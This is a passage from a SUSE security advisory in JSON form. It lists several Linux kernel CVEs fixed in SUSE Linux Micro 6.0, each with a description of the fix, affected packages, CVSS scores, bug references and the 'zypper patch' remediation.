"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53795",
"url": "https://www.suse.com/security/cve/CVE-2023-53795"
},
{
"category": "external",
"summary": "SUSE Bug 1254737 for CVE-2023-53795",
"url": "https://bugzilla.suse.com/1254737"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53795"
},
{
"cve": "CVE-2023-53797",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53797"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nHID: wacom: Use ktime_t rather than int when dealing with timestamps\n\nCode which interacts with timestamps needs to use the ktime_t type\nreturned by functions like ktime_get. The int type does not offer\nenough space to store these values, and attempting to use it is a\nrecipe for problems. In this particular case, overflows would occur\nwhen calculating/storing timestamps leading to incorrect values being\nreported to userspace. In some cases these bad timestamps cause input\nhandling in userspace to appear hung.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53797",
"url": "https://www.suse.com/security/cve/CVE-2023-53797"
},
{
"category": "external",
"summary": "SUSE Bug 1254733 for CVE-2023-53797",
"url": "https://bugzilla.suse.com/1254733"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53797"
},
{
"cve": "CVE-2023-53799",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53799"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: api - Use work queue in crypto_destroy_instance\n\nThe function crypto_drop_spawn expects to be called in process\ncontext. However, when an instance is unregistered while it still\nhas active users, the last user may cause the instance to be freed\nin atomic context.\n\nFix this by delaying the freeing to a work queue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53799",
"url": "https://www.suse.com/security/cve/CVE-2023-53799"
},
{
"category": "external",
"summary": "SUSE Bug 1254732 for CVE-2023-53799",
"url": "https://bugzilla.suse.com/1254732"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53799"
},
{
"cve": "CVE-2023-53807",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53807"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: clocking-wizard: Fix Oops in clk_wzrd_register_divider()\n\nSmatch detected this potential error pointer dereference\nclk_wzrd_register_divider(). If devm_clk_hw_register() fails then\nit sets \"hw\" to an error pointer and then dereferences it on the\nnext line. Return the error directly instead.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53807",
"url": "https://www.suse.com/security/cve/CVE-2023-53807"
},
{
"category": "external",
"summary": "SUSE Bug 1254724 for CVE-2023-53807",
"url": "https://bugzilla.suse.com/1254724"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53807"
},
{
"cve": "CVE-2023-53808",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53808"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mwifiex: fix memory leak in mwifiex_histogram_read()\n\nAlways free the zeroed page on return from \u0027mwifiex_histogram_read()\u0027.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53808",
"url": "https://www.suse.com/security/cve/CVE-2023-53808"
},
{
"category": "external",
"summary": "SUSE Bug 1254723 for CVE-2023-53808",
"url": "https://bugzilla.suse.com/1254723"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53808"
},
{
"cve": "CVE-2023-53813",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53813"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix rbtree traversal bug in ext4_mb_use_preallocated\n\nDuring allocations, while looking for preallocations(PA) in the per\ninode rbtree, we can\u0027t do a direct traversal of the tree because\next4_mb_discard_group_preallocation() can paralelly mark the pa deleted\nand that can cause direct traversal to skip some entries. This was\nleading to a BUG_ON() being hit [1] when we missed a PA that could satisfy\nour request and ultimately tried to create a new PA that would overlap\nwith the missed one.\n\nTo makes sure we handle that case while still keeping the performance of\nthe rbtree, we make use of the fact that the only pa that could possibly\noverlap the original goal start is the one that satisfies the below\nconditions:\n\n 1. It must have it\u0027s logical start immediately to the left of\n (ie less than) original logical start.\n\n 2. It must not be deleted\n\nTo find this pa we use the following traversal method:\n\n1. Descend into the rbtree normally to find the immediate neighboring\nPA. Here we keep descending irrespective of if the PA is deleted or if\nit overlaps with our request etc. The goal is to find an immediately\nadjacent PA.\n\n2. If the found PA is on right of original goal, use rb_prev() to find\nthe left adjacent PA.\n\n3. Check if this PA is deleted and keep moving left with rb_prev() until\na non deleted PA is found.\n\n4. This is the PA we are looking for. Now we can check if it can satisfy\nthe original request and proceed accordingly.\n\nThis approach also takes care of having deleted PAs in the tree.\n\n(While we are at it, also fix a possible overflow bug in calculating the\nend of a PA)\n\n[1] https://lore.kernel.org/linux-ext4/CA+G9fYv2FRpLqBZf34ZinR8bU2_ZRAUOjKAD3+tKRFaEQHtt8Q@mail.gmail.com/",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53813",
"url": "https://www.suse.com/security/cve/CVE-2023-53813"
},
{
"category": "external",
"summary": "SUSE Bug 1254717 for CVE-2023-53813",
"url": "https://bugzilla.suse.com/1254717"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53813"
},
{
"cve": "CVE-2023-53815",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53815"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nposix-timers: Prevent RT livelock in itimer_delete()\n\nitimer_delete() has a retry loop when the timer is concurrently expired. On\nnon-RT kernels this just spin-waits until the timer callback has completed,\nexcept for posix CPU timers which have HAVE_POSIX_CPU_TIMERS_TASK_WORK\nenabled.\n\nIn that case and on RT kernels the existing task could live lock when\npreempting the task which does the timer delivery.\n\nReplace spin_unlock() with an invocation of timer_wait_running() to handle\nit the same way as the other retry loops in the posix timer code.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53815",
"url": "https://www.suse.com/security/cve/CVE-2023-53815"
},
{
"category": "external",
"summary": "SUSE Bug 1254715 for CVE-2023-53815",
"url": "https://bugzilla.suse.com/1254715"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-53815"
},
{
"cve": "CVE-2023-53819",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53819"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\namdgpu: validate offset_in_bo of drm_amdgpu_gem_va\n\nThis is motivated by OOB access in amdgpu_vm_update_range when\noffset_in_bo+map_size overflows.\n\nv2: keep the validations in amdgpu_vm_bo_map\nv3: add the validations to amdgpu_vm_bo_map/amdgpu_vm_bo_replace_map\n rather than to amdgpu_gem_va_ioctl",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
